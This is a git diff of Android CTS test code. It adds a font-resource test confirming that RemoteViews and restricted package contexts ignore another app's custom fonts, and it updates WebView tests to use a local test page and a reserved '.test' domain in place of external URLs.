a/tests/tests/text/resourceApk/AndroidManifest.xml b/tests/tests/text/resourceApk/AndroidManifest.xml new file mode 100644 index 00000000000..8851b0d378b --- /dev/null +++ b/tests/tests/text/resourceApk/AndroidManifest.xml @@ -0,0 +1,25 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + --> + +<manifest xmlns:android="http://schemas.android.com/apk/res/android" + package="android.text.cts.resources" > + + <application> + <activity android:name="android.text.cts.MainActivity" /> + </application> + +</manifest> diff --git a/tests/tests/text/resourceApk/assets/a3em.ttx b/tests/tests/text/resourceApk/assets/a3em.ttx new file mode 100644 index 00000000000..3a686b2fba3 --- /dev/null +++ b/tests/tests/text/resourceApk/assets/a3em.ttx @@ -0,0 +1,180 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!-- Copyright (C) 2021 The Android Open Source Project + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. +--> +<ttFont sfntVersion="\x00\x01\x00\x00" ttLibVersion="3.0"> + + <GlyphOrder> + <GlyphID id="0" name=".notdef"/> + <GlyphID id="1" name="a"/> + </GlyphOrder> + + <head> + <tableVersion value="1.0"/> + <fontRevision value="1.0"/> + <checkSumAdjustment value="0x640cdb2f"/> + <magicNumber value="0x5f0f3cf5"/> + <flags value="00000000 00000011"/> + <unitsPerEm value="1000"/> + <created value="Fri Mar 17 07:26:00 2017"/> + <macStyle value="00000000 00000000"/> + <lowestRecPPEM value="7"/> + <fontDirectionHint value="2"/> + <glyphDataFormat value="0"/> + </head> + + <hhea> + <tableVersion value="1.0"/> + <ascent value="1000"/> + <descent value="-200"/> + <lineGap value="0"/> + <caretSlopeRise value="1"/> + <caretSlopeRun value="0"/> + <caretOffset value="0"/> + <reserved0 value="0"/> + <reserved1 value="0"/> + <reserved2 value="0"/> + <reserved3 value="0"/> + <metricDataFormat value="0"/> + </hhea> + + <maxp> + <tableVersion value="0x10000"/> + <maxZones value="0"/> + <maxTwilightPoints value="0"/> + <maxStorage value="0"/> + <maxFunctionDefs value="0"/> + <maxInstructionDefs value="0"/> + <maxStackElements value="0"/> + <maxSizeOfInstructions value="0"/> + <maxComponentElements value="0"/> + </maxp> + + <OS_2> + <!-- The fields 'usFirstCharIndex' and 'usLastCharIndex' + will be recalculated by the compiler --> + <version value="3"/> + <xAvgCharWidth value="594"/> + <usWeightClass value="400"/> + <usWidthClass value="5"/> + <fsType value="00000000 00001000"/> + <ySubscriptXSize value="650"/> + <ySubscriptYSize value="600"/> + <ySubscriptXOffset value="0"/> + <ySubscriptYOffset value="75"/> + <ySuperscriptXSize value="650"/> + <ySuperscriptYSize value="600"/> + <ySuperscriptXOffset value="0"/> + <ySuperscriptYOffset value="350"/> + <yStrikeoutSize value="50"/> + <yStrikeoutPosition value="300"/> + <sFamilyClass value="0"/> + <panose> + <bFamilyType value="0"/> + <bSerifStyle value="0"/> + <bWeight value="5"/> + <bProportion value="0"/> + <bContrast value="0"/> + <bStrokeVariation value="0"/> + <bArmStyle value="0"/> + <bLetterForm value="0"/> + <bMidline value="0"/> + <bXHeight value="0"/> + </panose> + <ulUnicodeRange1 value="00000000 00000000 00000000 00000001"/> + <ulUnicodeRange2 value="00000000 00000000 00000000 00000000"/> + <ulUnicodeRange3 value="00000000 00000000 00000000 00000000"/> + <ulUnicodeRange4 value="00000000 00000000 00000000 00000000"/> + <achVendID value="UKWN"/> + <fsSelection value="00000000 01000000"/> + <usFirstCharIndex value="32"/> + <usLastCharIndex value="122"/> + <sTypoAscender value="800"/> + <sTypoDescender value="-200"/> + <sTypoLineGap value="200"/> + <usWinAscent value="1000"/> + <usWinDescent value="200"/> + <ulCodePageRange1 value="00000000 00000000 00000000 00000001"/> + <ulCodePageRange2 value="00000000 00000000 00000000 00000000"/> + <sxHeight value="500"/> + <sCapHeight value="700"/> + <usDefaultChar value="0"/> + <usBreakChar value="32"/> + <usMaxContext value="0"/> + </OS_2> + + <hmtx> + <mtx name=".notdef" width="500" lsb="93"/> + <mtx name="a" width="3000" lsb="93"/> <!-- 3em --> + </hmtx> + + <cmap> + <tableVersion version="0"/> + <cmap_format_4 platformID="3" platEncID="10" language="0"> + <map code="0x0061" name="a" /> + </cmap_format_4> + </cmap> + + <loca> + <!-- The 'loca' table will be calculated by the compiler --> + </loca> + + <glyf> + <TTGlyph name=".notdef" xMin="0" yMin="0" xMax="0" yMax="0" /> + <TTGlyph name="a" xMin="0" yMin="0" xMax="0" yMax="0" /> + </glyf> + + <name> + <namerecord nameID="0" platformID="3" platEncID="1" langID="0x409"> + Copyright (C) 2017 The Android Open Source Project + </namerecord> + <namerecord nameID="1" platformID="3" platEncID="1" langID="0x409"> + Sample Font + </namerecord> + <namerecord nameID="2" platformID="3" platEncID="1" langID="0x409"> + Regular + </namerecord> + <namerecord nameID="4" platformID="3" platEncID="1" langID="0x409"> + Sample Font + </namerecord> + <namerecord nameID="6" platformID="3" platEncID="1" langID="0x409"> + SampleFont-Regular + </namerecord> + <namerecord nameID="13" platformID="3" platEncID="1" langID="0x409"> + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + </namerecord> + <namerecord nameID="14" platformID="3" platEncID="1" langID="0x409"> + http://www.apache.org/licenses/LICENSE-2.0 + </namerecord> + </name> + + <post> + <formatType value="3.0"/> + <italicAngle value="0.0"/> + <underlinePosition value="-75"/> + <underlineThickness value="50"/> + <isFixedPitch value="0"/> + <minMemType42 value="0"/> + <maxMemType42 value="0"/> + <minMemType1 value="0"/> + <maxMemType1 value="0"/> + </post> + +</ttFont> diff --git a/tests/tests/text/resourceApk/res/font/a3em.ttf b/tests/tests/text/resourceApk/res/font/a3em.ttf Binary files differnew file mode 100644 index 00000000000..03e1347593b --- /dev/null +++ b/tests/tests/text/resourceApk/res/font/a3em.ttf diff --git a/tests/tests/text/resourceApk/res/layout/textview_layout.xml b/tests/tests/text/resourceApk/res/layout/textview_layout.xml new file mode 100644 index 00000000000..72efdc4c481 --- /dev/null +++ b/tests/tests/text/resourceApk/res/layout/textview_layout.xml @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + * Copyright (C) 2021 The Android Open Source Project. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + --> +<TextView xmlns:android="http://schemas.android.com/apk/res/android" + android:layout_width="wrap_content" + android:layout_height="wrap_content" + android:fontFamily="@font/a3em" + android:text="aaa"/> + diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/tests/tests/text/resourceApk/src/android/text/cts/MainActivity.java index f32aa90632c..39850bb1459 100644 --- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java +++ b/tests/tests/text/resourceApk/src/android/text/cts/MainActivity.java @@ -1,5 +1,5 @@ /* - * Copyright (C) 2020 The Android Open Source Project + * Copyright (C) 2021 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. @@ -13,14 +13,10 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -package android.security.cts; -import android.content.Context; +package android.text.cts; -public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider { +import android.app.Activity; - @Override - public boolean onCreate() { - return true; - } +public class MainActivity extends Activity { } diff --git a/tests/tests/text/src/android/text/cts/FontResourceTest.java b/tests/tests/text/src/android/text/cts/FontResourceTest.java new file mode 100644 index 00000000000..582177291bb --- /dev/null +++ b/tests/tests/text/src/android/text/cts/FontResourceTest.java @@ -0,0 +1,102 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.text.cts; + +import static com.google.common.truth.Truth.assertThat; + +import android.content.Context; +import android.platform.test.annotations.AppModeFull; +import android.util.TypedValue; +import android.view.LayoutInflater; +import android.view.View; +import android.widget.RemoteViews; +import android.widget.TextView; + +import androidx.test.InstrumentationRegistry; +import androidx.test.filters.SmallTest; +import androidx.test.runner.AndroidJUnit4; + +import org.junit.Test; +import org.junit.runner.RunWith; + +@AppModeFull +@SmallTest +@RunWith(AndroidJUnit4.class) +public class FontResourceTest { + + private static final int REMOTE_FONT_TEXT_WIDTH = 900; + private static final String RESOURCE_PACKAGE = "android.text.cts.resources"; + + private int getLayoutId() { + Context context = InstrumentationRegistry.getTargetContext(); + int resID = 0; + try { + resID = context.createPackageContext(RESOURCE_PACKAGE, 0) + .getResources().getIdentifier( + "textview_layout", + "layout", + RESOURCE_PACKAGE); + } catch (Exception e) { + throw new RuntimeException(e); + } + assertThat(resID).isNotEqualTo(0); + return resID; + } + + private TextView inflateWithRemoteViews(Context ctx) { + RemoteViews remoteViews = new RemoteViews(RESOURCE_PACKAGE, getLayoutId()); + return (TextView) remoteViews.apply(ctx, null); + } + + private TextView inflateWithInflator(Context ctx) { + LayoutInflater inflater = LayoutInflater.from(ctx); + return (TextView) inflater.inflate(getLayoutId(), null); + } + + private int measureText(TextView textView) { + textView.setTextSize(TypedValue.COMPLEX_UNIT_PX, 100f); // make 1em = 100px + textView.measure( + View.MeasureSpec.makeMeasureSpec(0, View.MeasureSpec.UNSPECIFIED), + View.MeasureSpec.makeMeasureSpec(0, View.MeasureSpec.UNSPECIFIED)); + return textView.getLayout().getWidth(); + } + + @Test + public void testRemoteResource() throws Exception { + Context context = InstrumentationRegistry.getTargetContext(); + + Context freeContext = context.createPackageContext( + RESOURCE_PACKAGE, Context.CONTEXT_IGNORE_SECURITY); + Context restrictContext = context.createPackageContext( + RESOURCE_PACKAGE, Context.CONTEXT_RESTRICTED); + + // This expectation is for verifying the precondition of the test case. If the context + // ignores the security, loads the custom font and TextView gives the width with it. If the + // context is restricted, the custom font should not be loaded and TextView gives the width + // different from the one with the custom font. + // The custom font has 3em for "a" character. The text is "aaa", then 9em = 900px is the + // expected width. + assertThat(measureText(inflateWithInflator(freeContext))) + .isEqualTo(REMOTE_FONT_TEXT_WIDTH); + assertThat(measureText(inflateWithInflator(restrictContext))) + .isNotEqualTo(REMOTE_FONT_TEXT_WIDTH); + + // The RemoteView should ignore the custom font files. + assertThat(measureText(inflateWithRemoteViews(context))) + .isNotEqualTo(REMOTE_FONT_TEXT_WIDTH); + } +} diff --git a/tests/tests/webkit/assets/webkit/page_with_link.html b/tests/tests/webkit/assets/webkit/page_with_link.html index 50fb78a4c01..4fbe86901ac 100644 --- a/tests/tests/webkit/assets/webkit/page_with_link.html +++ b/tests/tests/webkit/assets/webkit/page_with_link.html @@ -15,6 +15,8 @@ <html> <body> - <a href="http://foo.com" id="link">a link</a> + <!-- This is a relative link to an arbitrary page also hosted on this + server. --> + <a href="/assets/webkit/test_blankPage.html" id="link">a link</a> </body> </html> diff --git a/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java b/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java index ac0283c5f21..360895ae605 100644 --- a/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java +++ b/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java @@ -57,7 +57,11 @@ public class TestHtmlConstants { public static final String LOGIN_FORM_URL = "webkit/test_loginForm.html"; - public static final String EXT_WEB_URL1 = "http://www.example.com/"; + // Note: tests should avoid loading external URLs if at all possible, since any changes to that + // public site (even if it doesn't currently exist) can affect test behavior. The ".test" TLD is + // OK because (1) it's reserved for testing by RFC2606 and (2) the test never navigates to this + // page. + public static final String EXT_WEB_URL1 = "http://www.example.test/"; public static final String PARAM_ASSET_URL = "webkit/test_queryparam.html"; public static final String ANCHOR_ASSET_URL = "webkit/test_anchor.html"; @@ -66,8 +70,9 @@ public class TestHtmlConstants { public static final String DATABASE_ACCESS_URL = "webkit/test_databaseaccess.html"; public static final String STOP_LOADING_URL = "webkit/test_stop_loading.html"; public static final String BLANK_TAG_URL = "webkit/blank_tag.html"; + // A page with a link to an arbitrary page controlled by the test server (in this case, + // BLANK_PAGE_URL). public static final String PAGE_WITH_LINK_URL = "webkit/page_with_link.html"; - public static final String URL_IN_PAGE_WITH_LINK = "http://foo.com/"; // Not a real page, just triggers a 404 response. public static final String NON_EXISTENT_PAGE_URL = "webkit/generate_404.html"; public static final String BAD_IMAGE_PAGE_URL = "webkit/test_bad_image_url.html"; diff --git a/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java b/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java index 81ea695998b..a99e9aff1a9 100644 --- a/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java +++ b/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java @@ -204,8 +204,10 @@ public class WebViewClientTest extends ActivityInstrumentationTestCase2<WebViewC } }.run(); assertEquals(mainCallCount, mainWebViewClient.getShouldOverrideUrlLoadingCallCount()); - assertEquals( - TestHtmlConstants.URL_IN_PAGE_WITH_LINK, childWebViewClient.getLastShouldOverrideUrl()); + // PAGE_WITH_LINK_URL has a link to BLANK_PAGE_URL (an arbitrary page also controlled by the + // test server) + assertEquals(mWebServer.getAssetUrl(TestHtmlConstants.BLANK_PAGE_URL), + childWebViewClient.getLastShouldOverrideUrl()); } private void clickOnLinkUsingJs(final String linkId, WebViewOnUiThread webViewOnUiThread) { |